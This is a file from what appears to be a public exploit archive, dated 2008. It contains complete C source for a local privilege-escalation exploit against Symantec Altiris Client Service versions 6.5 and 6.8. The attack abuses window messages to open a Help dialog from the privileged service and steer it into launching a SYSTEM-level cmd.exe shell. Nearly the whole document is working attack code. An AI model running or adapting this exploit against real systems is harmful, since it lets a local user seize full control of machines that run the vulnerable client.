symantec-escalate.txt
Posted on 15 May 2008
// 0day PRIVATE NOT DISTRIBUTE!!! // // Symantec Altiris Client Service Local Exploit (0day) // // Affected Versions : Altiris Client 6.5.248 // Altiris Client 6.5.299 // Altiris client 6.8.378 // // Alex Hernandez aka alt3kx // ahernandez [at] sybsecurity.com // // Eduardo Vela aka sirdarckcat // sirdarckcat [at] gmail.com // // We'll see you soon at ph-neutral 0x7d8 #include "stdio.h" #include "windows.h" int main(int argc, char* argv[]) { HWND lHandle, lHandle2; POINT point; int id,a=0; char langH[255][255]; char langO[255][255]; char wname[]="Altiris Client Service"; strcpy(langH[0x0c],"Aide de Windows"); strcpy(langH[0x09],"Windows Help"); strcpy(langH[0x0a],"Ayuda de Windows"); strcpy(langO[0x0c],"Ouvrir"); strcpy(langO[0x09],"Open"); strcpy(langO[0x0a],"Abrir"); printf("########################################################## "); printf("# Altiris Client Service # "); printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit # "); printf("# by sirdarckcat & alt3kx # "); printf("# # "); printf("# This exploit is based on www.milw0rm.com/exploits/350 # "); printf("# Utility Manager Privilege Elevation Exploit (MS04-019) # "); printf("# by Cesar Cerrudo # "); printf("########################################################## "); id=PRIMARYLANGID(GetSystemDefaultLangID()); if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){ printf("Lang not found, using english "); id=9; } char sText[]="%windir%\system32\cmd.ex?"; if (argc<2){ printf("Use: > %s [LANG-ID] ",argv[0]); printf("Look for your LANG-ID here: "); printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx "); printf(" Anyway, the program will try to guess it. "); return 0; }else{ if (argc==2){ if (langH[atoi(argv[1])]){ id=atoi(argv[1]); printf("Lang changed "); }else{ printf("Lang not supported ",id); } } } printf("Using Lang %d ",id); printf("Looking for %s.. ",wname); lHandle=FindWindow(NULL, wname); if (!lHandle) { printf("Window %s not found ", wname); return 0; }else{ printf("Found! exploiting.. "); } PostMessage(lHandle,0x313,NULL,NULL); Sleep(100); SendMessage(lHandle,0x365,NULL,0x1); Sleep(300); pp: if (!FindWindow(NULL, langH[id])){ printf("Help Window not found.. exploit unsuccesful "); if (id!=9){ printf("Trying with english.. "); id=9; goto pp; }else{ return 0; } }else{ printf("Help Window found! exploiting.. "); } SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0); Sleep(500); lHandle = FindWindow("#32770",langO[id]); lHandle2 = GetDlgItem(lHandle, 0x47C); Sleep(500); printf("Sending path.. "); SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText); Sleep(800); SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0); lHandle2 = GetDlgItem(lHandle, 0x4A0); printf("Looking for cmd.. "); SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0); Sleep(500); lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL); lHandle2 = GetDlgItem(lHandle2, 0x1); printf("Sending keys.. "); SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); Sleep(500); mark: PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0); Sleep(1000); point.x =10; point.y =30; lHandle2=WindowFromPoint(point); Sleep(1000); printf("Opening shell.. "); SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); Sleep(1000); SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); Sleep(1000); SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); Sleep(1000); if (!FindWindow(NULL,"C:\WINDOWS\system32\cmd.exe") && !FindWindow(NULL,"C:\WINNT\system32\cmd.exe")){ printf("Failed "); if (!a){ a++; goto mark; } }else{ printf("Done! "); } if(!a){ SendMessage (lHandle, WM_CLOSE,0,0); Sleep(500); SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0); SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0); }else{ printf("The exploit failed, but maybe the context window of the shell is visibile. "); } return 0; }
